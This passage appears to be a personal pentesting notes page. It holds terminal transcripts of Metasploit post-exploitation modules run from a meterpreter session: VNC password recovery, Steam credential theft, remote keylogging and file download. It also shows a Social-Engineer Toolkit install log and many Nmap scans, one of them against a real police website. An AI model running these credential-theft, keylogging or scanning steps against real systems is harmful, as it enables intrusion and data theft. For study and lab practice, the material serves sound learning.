[*] Enumerating VNC passwords on ZTIK-PC
[+] Location: UltraVNC => Hash: A7F8FC867315B7FF5F => Password: 12345 => Port: 5900
[+] VIEW ONLY: UltraVNC => 89132B51B604FB804D => 54321 on port: 5900
[*] Post module execution completed

Steal Steam credentials

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/credentials/steam
msf post(steam) > show options
 
Module options (post/windows/gather/credentials/steam):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
 
msf post(steam) > set SESSION 1
SESSION => 1
msf post(steam) > run
 
[*] Checking for Steam configs in C:\Program Files (x86)\Steam\config
[*] Located steam config files.
[-] RememberPassword is not set, exiting.
[*] Post module execution completed
msf post(steam) >

Remote keylogging

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/capture/keylog_recorder
msf post(keylog_recorder) > show options
 
Module options (post/windows/capture/keylog_recorder):
 
   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CAPTURE_TYPE  explorer         no        Capture keystrokes for Explorer, Winlogon or PID (Accepted: explorer, winlogon, pid)
   INTERVAL      5                no        Time interval to save keystrokes in seconds
   LOCKSCREEN    false            no        Lock system screen.
   MIGRATE       false            no        Perform Migration.
   PID                            no        Process ID to migrate to
   SESSION                        yes       The session to run this module on.
 
msf post(keylog_recorder) > set SESSION 1
SESSION => 1
msf post(keylog_recorder) > run
 
[*] Executing module against ZTIK-PC
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /home/ztik/.msf4/loot/20170220004004_default_10.0.2.13_host.windows.key_571976.txt
[*] Recording keystrokes...
^C
[*] User interrupt.
[*] Shutting down keylog recorder. Please wait...
[*] Post module execution completed
msf post(keylog_recorder) > cat /home/ztik/.msf4/loot/20170220004004_default_10.0.2.13_host.windows.key_571976.txt
[*] exec: cat /home/ztik/.msf4/loot/20170220004004_default_10.0.2.13_host.windows.key_571976.txt
 
Keystroke log from payload.exe on ZTIK-PC with user ZTIK-PC\ZTiK started at 2017-02-20 00:40:04 +0100
 
 <LWin> rcmd
 <Return> dir <Return> exit
 <Return> 
 
Keylog Recorder exited at 2017-02-20 00:40:29 +0100
 
msf post(keylog_recorder) >

Search and download specific filetypes on remote host

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/enum_files
msf post(enum_files) > show options
 
Module options (post/windows/gather/enum_files):
 
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILE_GLOBS   *.config         yes       The file pattern to search for in a filename
   SEARCH_FROM                   no        Search from a specific location. Ex. C:\
   SESSION                       yes       The session to run this module on.
 
msf post(enum_files) > set SESSION 1
SESSION => 1
msf post(enum_files) > set SEARCH_FROM E:\\txts
SEARCH_FROM => E:\\txts
msf post(enum_files) > set FILE_GLOBS *.txt
FILE_GLOBS => *.txt
msf post(enum_files) > run
 
[*] Searching E:\txts
[*] Downloading E:\txts\test.txt
[+] test.txt saved as: /home/ztik/.msf4/loot/20170220004750_default_10.0.2.13_host.files_534281.txt
[*] Done!
[*] Post module execution completed
msf post(enum_files) >

Installing SET on Debian Jessie

ztik@unknownhost:~$ cd /opt
ztik@unknownhost:/opt$ git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
Cloning into 'set'...
remote: Counting objects: 108952, done.
remote: Total 108952 (delta 0), reused 0 (delta 0), pack-reused 108952
Receiving objects: 100% (108952/108952), 174.40 MiB | 6.89 MiB/s, done.
Resolving deltas: 100% (67445/67445), done.
Checking connectivity... done.
Checking out files: 100% (328/328), done.
ztik@unknownhost:/opt$ cd set
ztik@unknownhost:/opt/set$ sudo ./setup.py install
Reading package lists... Done
Building dependency tree       
Reading state information... Done
build-essential is already the newest version.
git is already the newest version.
git set to manually installed.
The following extra packages will be installed:
  apache2-data apache2-utils freetds-common libonig2 libqdbm14 libsybdb5 php5-cli php5-common php5-json php5-readline python-cffi python-cryptography python-ndg-httpsclient python-ply python-pyasn1
  python-pycparser python-urllib3
Suggested packages:
  apache2-doc apache2-suexec-pristine apache2-suexec-custom php-pear php5-user-cache python-dev python-crypto-dbg python-crypto-doc python-cryptography-doc python-cryptography-vectors python-openssl-doc
  python-openssl-dbg python-pexpect-doc python-ply-doc doc-base
The following NEW packages will be installed:
  apache2 apache2-data apache2-utils freetds-common libapache2-mod-php5 libonig2 libqdbm14 libsybdb5 php5-cli php5-common php5-json php5-readline python-cffi python-crypto python-cryptography
  python-ndg-httpsclient python-openssl python-pefile python-pexpect python-ply python-pyasn1 python-pycparser python-pymssql python-requests python-urllib3
0 upgraded, 25 newly installed, 0 to remove and 0 not upgraded.
Need to get 7,403 kB of archives.
After this operation, 29.0 MB of additional disk space will be used.
Get:1 http://ftp.nl.debian.org/debian/ jessie/main apache2-utils amd64 2.4.10-10+deb8u7 [195 kB]
Get:2 http://security.debian.org/ jessie/updates/main php5-common amd64 5.6.30+dfsg-0+deb8u1 [735 kB]
Get:3 http://ftp.nl.debian.org/debian/ jessie/main apache2-data all 2.4.10-10+deb8u7 [163 kB]
Get:4 http://ftp.nl.debian.org/debian/ jessie/main apache2 amd64 2.4.10-10+deb8u7 [208 kB]
Get:5 http://ftp.nl.debian.org/debian/ jessie/main libonig2 amd64 5.9.5-3.2 [118 kB]
Get:6 http://ftp.nl.debian.org/debian/ jessie/main freetds-common all 0.91-6 [57.9 kB]
Get:7 http://security.debian.org/ jessie/updates/main php5-cli amd64 5.6.30+dfsg-0+deb8u1 [2,200 kB]
Get:8 http://ftp.nl.debian.org/debian/ jessie/main libsybdb5 amd64 0.91-6+b1 [197 kB]
Get:9 http://security.debian.org/ jessie/updates/main libapache2-mod-php5 amd64 5.6.30+dfsg-0+deb8u1 [2,230 kB]
Get:10 http://security.debian.org/ jessie/updates/main php5-readline amd64 5.6.30+dfsg-0+deb8u1 [12.7 kB]
Get:11 http://ftp.nl.debian.org/debian/ jessie/main libqdbm14 amd64 1.8.78-5+b1 [118 kB]
Get:12 http://ftp.nl.debian.org/debian/ jessie/main php5-json amd64 1.3.6-1 [18.6 kB]
Get:13 http://ftp.nl.debian.org/debian/ jessie/main python-ply all 3.4-5 [62.9 kB]
Get:14 http://ftp.nl.debian.org/debian/ jessie/main python-pycparser all 2.10+dfsg-3 [58.8 kB]
Get:15 http://ftp.nl.debian.org/debian/ jessie/main python-cffi amd64 0.8.6-1 [67.2 kB]
Get:16 http://ftp.nl.debian.org/debian/ jessie/main python-crypto amd64 2.6.1-5+deb8u1 [256 kB]
Get:17 http://ftp.nl.debian.org/debian/ jessie/main python-cryptography amd64 0.6.1-1 [165 kB]
Get:18 http://ftp.nl.debian.org/debian/ jessie/main python-openssl all 0.14-1 [81.1 kB]
Get:19 http://ftp.nl.debian.org/debian/ jessie/main python-ndg-httpsclient all 0.3.2-1 [20.5 kB]
Get:20 http://ftp.nl.debian.org/debian/ jessie/main python-pexpect all 3.2-1 [38.4 kB]
Get:21 http://ftp.nl.debian.org/debian/ jessie/main python-pyasn1 all 0.1.7-1 [49.3 kB]
Get:22 http://ftp.nl.debian.org/debian/ jessie/main python-pymssql amd64 1.0.2+dfsg-1+b3 [51.9 kB]
Get:23 http://ftp.nl.debian.org/debian/ jessie/main python-urllib3 all 1.9.1-3 [55.4 kB]
Get:24 http://ftp.nl.debian.org/debian/ jessie/main python-requests all 2.4.3-6 [204 kB]
Get:25 http://ftp.nl.debian.org/debian/ jessie/main python-pefile all 1.2.9.1-1.1 [41.1 kB]
Fetched 7,403 kB in 2s (3,152 kB/s)        
Selecting previously unselected package apache2-utils.
(Reading database ... 153693 files and directories currently installed.)
Preparing to unpack .../apache2-utils_2.4.10-10+deb8u7_amd64.deb ...
Unpacking apache2-utils (2.4.10-10+deb8u7) ...
Selecting previously unselected package apache2-data.
Preparing to unpack .../apache2-data_2.4.10-10+deb8u7_all.deb ...
Unpacking apache2-data (2.4.10-10+deb8u7) ...
Selecting previously unselected package apache2.
Preparing to unpack .../apache2_2.4.10-10+deb8u7_amd64.deb ...
Unpacking apache2 (2.4.10-10+deb8u7) ...
Selecting previously unselected package libonig2:amd64.
Preparing to unpack .../libonig2_5.9.5-3.2_amd64.deb ...
Unpacking libonig2:amd64 (5.9.5-3.2) ...
Selecting previously unselected package freetds-common.
Preparing to unpack .../freetds-common_0.91-6_all.deb ...
Unpacking freetds-common (0.91-6) ...
Selecting previously unselected package libsybdb5:amd64.
Preparing to unpack .../libsybdb5_0.91-6+b1_amd64.deb ...
Unpacking libsybdb5:amd64 (0.91-6+b1) ...
Selecting previously unselected package libqdbm14.
Preparing to unpack .../libqdbm14_1.8.78-5+b1_amd64.deb ...
Unpacking libqdbm14 (1.8.78-5+b1) ...
Selecting previously unselected package php5-common.
Preparing to unpack .../php5-common_5.6.30+dfsg-0+deb8u1_amd64.deb ...
Unpacking php5-common (5.6.30+dfsg-0+deb8u1) ...
Selecting previously unselected package php5-json.
Preparing to unpack .../php5-json_1.3.6-1_amd64.deb ...
Unpacking php5-json (1.3.6-1) ...
Selecting previously unselected package php5-cli.
Preparing to unpack .../php5-cli_5.6.30+dfsg-0+deb8u1_amd64.deb ...
Unpacking php5-cli (5.6.30+dfsg-0+deb8u1) ...
Selecting previously unselected package libapache2-mod-php5.
Preparing to unpack .../libapache2-mod-php5_5.6.30+dfsg-0+deb8u1_amd64.deb ...
Unpacking libapache2-mod-php5 (5.6.30+dfsg-0+deb8u1) ...
Selecting previously unselected package php5-readline.
Preparing to unpack .../php5-readline_5.6.30+dfsg-0+deb8u1_amd64.deb ...
Unpacking php5-readline (5.6.30+dfsg-0+deb8u1) ...
Selecting previously unselected package python-ply.
Preparing to unpack .../python-ply_3.4-5_all.deb ...
Unpacking python-ply (3.4-5) ...
Selecting previously unselected package python-pycparser.
Preparing to unpack .../python-pycparser_2.10+dfsg-3_all.deb ...
Unpacking python-pycparser (2.10+dfsg-3) ...
Selecting previously unselected package python-cffi.
Preparing to unpack .../python-cffi_0.8.6-1_amd64.deb ...
Unpacking python-cffi (0.8.6-1) ...
Selecting previously unselected package python-crypto.
Preparing to unpack .../python-crypto_2.6.1-5+deb8u1_amd64.deb ...
Unpacking python-crypto (2.6.1-5+deb8u1) ...
Selecting previously unselected package python-cryptography.
Preparing to unpack .../python-cryptography_0.6.1-1_amd64.deb ...
Unpacking python-cryptography (0.6.1-1) ...
Selecting previously unselected package python-openssl.
Preparing to unpack .../python-openssl_0.14-1_all.deb ...
Unpacking python-openssl (0.14-1) ...
Selecting previously unselected package python-ndg-httpsclient.
Preparing to unpack .../python-ndg-httpsclient_0.3.2-1_all.deb ...
Unpacking python-ndg-httpsclient (0.3.2-1) ...
Selecting previously unselected package python-pexpect.
Preparing to unpack .../python-pexpect_3.2-1_all.deb ...
Unpacking python-pexpect (3.2-1) ...
Selecting previously unselected package python-pyasn1.
Preparing to unpack .../python-pyasn1_0.1.7-1_all.deb ...
Unpacking python-pyasn1 (0.1.7-1) ...
Selecting previously unselected package python-pymssql.
Preparing to unpack .../python-pymssql_1.0.2+dfsg-1+b3_amd64.deb ...
Unpacking python-pymssql (1.0.2+dfsg-1+b3) ...
Selecting previously unselected package python-urllib3.
Preparing to unpack .../python-urllib3_1.9.1-3_all.deb ...
Unpacking python-urllib3 (1.9.1-3) ...
Selecting previously unselected package python-requests.
Preparing to unpack .../python-requests_2.4.3-6_all.deb ...
Unpacking python-requests (2.4.3-6) ...
Selecting previously unselected package python-pefile.
Preparing to unpack .../python-pefile_1.2.9.1-1.1_all.deb ...
Unpacking python-pefile (1.2.9.1-1.1) ...
Processing triggers for man-db (2.7.0.2-5) ...
Processing triggers for systemd (215-17+deb8u6) ...
Setting up apache2-utils (2.4.10-10+deb8u7) ...
Setting up apache2-data (2.4.10-10+deb8u7) ...
Setting up apache2 (2.4.10-10+deb8u7) ...
Enabling module mpm_event.
Enabling module authz_core.
Enabling module authz_host.
Enabling module authn_core.
Enabling module auth_basic.
Enabling module access_compat.
Enabling module authn_file.
Enabling module authz_user.
Enabling module alias.
Enabling module dir.
Enabling module autoindex.
Enabling module env.
Enabling module mime.
Enabling module negotiation.
Enabling module setenvif.
Enabling module filter.
Enabling module deflate.
Enabling module status.
Enabling conf charset.
Enabling conf localized-error-pages.
Enabling conf other-vhosts-access-log.
Enabling conf security.
Enabling conf serve-cgi-bin.
Enabling site 000-default.
Setting up libonig2:amd64 (5.9.5-3.2) ...
Setting up freetds-common (0.91-6) ...
Setting up libsybdb5:amd64 (0.91-6+b1) ...
Setting up libqdbm14 (1.8.78-5+b1) ...
Setting up php5-common (5.6.30+dfsg-0+deb8u1) ...
 
Creating config file /etc/php5/mods-available/pdo.ini with new version
php5_invoke: Enable module pdo for apache2 SAPI
php5_invoke: Enable module pdo for cli SAPI
 
Creating config file /etc/php5/mods-available/opcache.ini with new version
php5_invoke: Enable module opcache for apache2 SAPI
php5_invoke: Enable module opcache for cli SAPI
Setting up php5-json (1.3.6-1) ...
php5_invoke: Enable module json for apache2 SAPI
php5_invoke: Enable module json for cli SAPI
Setting up php5-cli (5.6.30+dfsg-0+deb8u1) ...
update-alternatives: using /usr/bin/php5 to provide /usr/bin/php (php) in auto mode
update-alternatives: using /usr/bin/phar5 to provide /usr/bin/phar (phar) in auto mode
 
Creating config file /etc/php5/cli/php.ini with new version
Setting up libapache2-mod-php5 (5.6.30+dfsg-0+deb8u1) ...
 
Creating config file /etc/php5/apache2/php.ini with new version
Module mpm_event disabled.
Enabling module mpm_prefork.
apache2_switch_mpm Switch to prefork
apache2_invoke: Enable module php5
Setting up php5-readline (5.6.30+dfsg-0+deb8u1) ...
 
Creating config file /etc/php5/mods-available/readline.ini with new version
php5_invoke: Enable module readline for apache2 SAPI
php5_invoke: Enable module readline for cli SAPI
Setting up python-ply (3.4-5) ...
Setting up python-pycparser (2.10+dfsg-3) ...
Setting up python-cffi (0.8.6-1) ...
Setting up python-crypto (2.6.1-5+deb8u1) ...
Setting up python-cryptography (0.6.1-1) ...
Setting up python-openssl (0.14-1) ...
Setting up python-ndg-httpsclient (0.3.2-1) ...
Setting up python-pexpect (3.2-1) ...
Setting up python-pyasn1 (0.1.7-1) ...
Setting up python-pymssql (1.0.2+dfsg-1+b3) ...
Setting up python-urllib3 (1.9.1-3) ...
Setting up python-requests (2.4.3-6) ...
Setting up python-pefile (1.2.9.1-1.1) ...
Processing triggers for systemd (215-17+deb8u6) ...
Processing triggers for libc-bin (2.19-18+deb8u7) ...
Processing triggers for libapache2-mod-php5 (5.6.30+dfsg-0+deb8u1) ...
Processing triggers for python-support (1.0.15) ...
[*] Copying SET into the /usr/share/setoolkit directory...
[*] Installing setoolkit installer to /usr/bin/setoolkit...
 
[*] We are now finished! To run SET, type setoolkit...
ztik@unknownhost:/opt/set$ 

Running and updating SET

ztik@unknownhost:/opt/set$ setoolkit 
[-] New set.config.py file generated on: 2017-02-20 01:08:14.939622
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2017-02-20 01:08:14.939622
[*] SET is using the new config, no need to restart
Copyright 2017, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved.
 
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
 
    * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
    * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
    * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
 
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY  THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
 
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
 
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it).
 
Also note that by using this software, if you ever see the creator of SET in a bar, you should (optional) give him a hug and should (optional) buy him a beer (or bourbon - hopefully bourbon). Author has the option to refuse the hug (most likely will never happen) or the beer or bourbon (also most likely will never happen). Also by using this tool (these are all optional of course!), you should try to make this industry better, try to stay positive, try to help others, try to learn from one another, try stay out of drama, try offer free hugs when possible (and make sure recipient agrees to mutual hug), and try to do everything you can to be awesome.
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.
 
 
Do you agree to the terms of service [y/n]: Y
 
 
                          .  ..
                       MMMMMNMNMMMM=
                   .DMM.           .MM$
                 .MM.                 MM,.
                 MN.                    MM.
               .M.                       MM
              .M   .....................  NM
              MM   .8888888888888888888.   M7
             .M    88888888888888888888.   ,M
             MM       ..888.MMMMM    .     .M.
             MM         888.MMMMMMMMMMM     M
             MM         888.MMMMMMMMMMM.    M
             MM         888.      NMMMM.   .M
              M.        888.MMMMMMMMMMM.   ZM
              NM.       888.MMMMMMMMMMM    M:
              .M+      .....              MM.
               .MM.                     .MD
                 MM .                  .MM
                  $MM                .MM.
                    ,MM?          .MMM
                       ,MMMMMMMMMMM
 
                https://www.trustedsec.com
 
[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                       Version: 7.5
                     Codename: 'Ghost'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
 
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.
 
     Join us on irc.freenode.net in channel #setoolkit
 
   The Social-Engineer Toolkit is a product of TrustedSec.
 
           Visit: https://www.trustedsec.com
 
   Its easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
 
 
 Select from the menu:
 
   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About
 
  99) Exit the Social-Engineer Toolkit
 
set> 4
 
 
[-] Kali or BackBox Linux not detected, manually updating..
[-] Updating the Social-Engineer Toolkit, be patient...
[-] Performing cleanup first...
Removing src/agreement4
Removing src/logs/
[-] Updating... This could take a little bit...
Already up-to-date.
[*] The updating has finished, returning to main menu..
 
            :::===  :::===== :::====
            :::     :::      :::====
             =====  ======     ===
                === ===        ===
            ======  ========   ===
 
 
[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                       Version: 7.5
                     Codename: 'Ghost'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
 
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.
 
     Join us on irc.freenode.net in channel #setoolkit
 
   The Social-Engineer Toolkit is a product of TrustedSec.
 
           Visit: https://www.trustedsec.com
 
   Its easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
 
 
 Select from the menu:
 
   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About
 
  99) Exit the Social-Engineer Toolkit
 
set>

Insert some stuff about the Open Source Vulnerability DataBase… whenever I feel like doing that…


Insert some stuff about the OpenVAS… whenever I feel like doing that as well…


Passive Vulnerability Scanner by Tenable


Nexpose by Rapid7


SSDD, more stuff I still need to update :x


I wonder if I'll ever be done with putting online all my scripts, guides and other stuff…


Nmap version check

ztik@unknownhost:~$ nmap -V
 
Nmap version 7.40 ( https://nmap.org )
Platform: x86_64-unknown-linux-gnu
Compiled with: nmap-liblua-5.3.3 openssl-1.0.1t nmap-libpcre-7.6 nmap-libpcap-1.7.3 nmap-libdnet-1.12 ipv6
Compiled without:
Available nsock engines: epoll poll select

Nmap scan single IP

ztik@unknownhost:~$ nmap 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 16:20 CET
Nmap scan report for 10.0.2.15
Host is up (0.0042s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

Nmap scan multiple IPs

ztik@unknownhost:~$ nmap 10.0.2.1-25
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 16:32 CET
Nmap scan report for 10.0.2.15
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 25 IP addresses (1 host up) scanned in 2.90 seconds

Nmap scan single hostname

ztik@unknownhost:~$ nmap www.politie.nl
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 16:33 CET
Nmap scan report for www.politie.nl (152.195.52.37)
Host is up (0.024s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
 
Nmap done: 1 IP address (1 host up) scanned in 5.14 seconds

Nmap scan subnet

ztik@unknownhost:~$ nmap 10.0.2.0/24
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 16:33 CET
Nmap scan report for 10.0.2.15
Host is up (0.00036s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 256 IP addresses (1 host up) scanned in 3.64 seconds

Nmap scan from textfile

ztik@unknownhost:~$ nmap -iL scanlist.txt
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:33 CET
Nmap scan report for 10.0.2.15
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 25 IP addresses (1 host up) scanned in 2.53 seconds

Nmap scan specific port

ztik@unknownhost:~$ nmap -p 22 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:35 CET
Nmap scan report for 10.0.2.15
Host is up (0.00052s latency).
PORT   STATE SERVICE
22/tcp open  ssh
 
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

Nmap scan port range

ztik@unknownhost:~$ nmap -p 1-1024 10.0.2.15
 
Starting Nmap 6.47 ( http://nmap.org ) at 2017-02-19 06:26 CET
Nmap scan report for 10.0.2.15
Host is up (0.00041s latency).
Not shown: 1022 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds

Nmap scan 100 most common ports

ztik@unknownhost:~$ nmap -F 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:35 CET
Nmap scan report for 10.0.2.15
Host is up (0.00010s latency).
Not shown: 98 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

Nmap scan all 65535 ports

ztik@unknownhost:~$ nmap -p- 10.0.2.15
 
Starting Nmap 6.47 ( http://nmap.org ) at 2017-02-19 06:26 CET
Nmap scan report for 10.0.2.15
Host is up (0.00023s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
111/tcp   open  rpcbind
48715/tcp open  unknown
 
Nmap done: 1 IP address (1 host up) scanned in 2.11 seconds

Nmap TCP connect scan

ztik@unknownhost:~$ nmap -sT 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:36 CET
Nmap scan report for 10.0.2.15
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

Nmap TCP SYN scan

ztik@unknownhost:~$ nmap -sS 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:38 CET
Nmap scan report for 10.0.2.15
Host is up (0.0000060s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

Nmap UDP scan

ztik@unknownhost:~$ nmap -sU -p 68 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:38 CET
Nmap scan report for 10.0.2.15
Host is up.
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
 
Nmap done: 1 IP address (1 host up) scanned in 2.29 seconds

Nmap OS detection

ztik@unknownhost:~$ nmap -O 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:39 CET
Nmap scan report for 10.0.2.15
Host is up (0.000086s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.8 - 4.6
Network Distance: 0 hops
 
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.57 seconds

Nmap OS and Services detection

ztik@unknownhost:~$ nmap -A 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:39 CET
Nmap scan report for 10.0.2.15
Host is up (0.000056s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 2d:3c:fe:7a:85:c5:e0:28:ee:6e:80:eb:4b:2f:c6:b7 (DSA)
|   2048 2b:b2:c1:eb:57:ba:4e:f8:17:c2:91:d4:c8:42:09:66 (RSA)
|_  256 73:5f:36:69:02:e7:7e:7d:84:3f:a4:e1:e7:fd:67:2c (ECDSA)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          44560/tcp  status
|_  100024  1          56360/udp  status
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.8 - 4.6
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.71 seconds

Nmap default service detection

ztik@unknownhost:~$ sudo nmap -sV 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:40 CET
Nmap scan report for 10.0.2.15
Host is up (0.0000070s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds

Nmap light service detection

ztik@unknownhost:~$ sudo nmap -sV --version-intensity 0 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:41 CET
Nmap scan report for 10.0.2.15
Host is up (0.0000070s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.86 seconds

Nmap aggressive service detection

ztik@unknownhost:~$ sudo nmap -sV --version-intensity 5 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:42 CET
Nmap scan report for 10.0.2.15
Host is up (0.0000070s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds

Nmap NSE safe script scan

ztik@unknownhost:~$ sudo nmap -sV -sC 10.0.2.15
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-19 17:45 CET
Nmap scan report for 10.0.2.15
Host is up (0.0000060s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
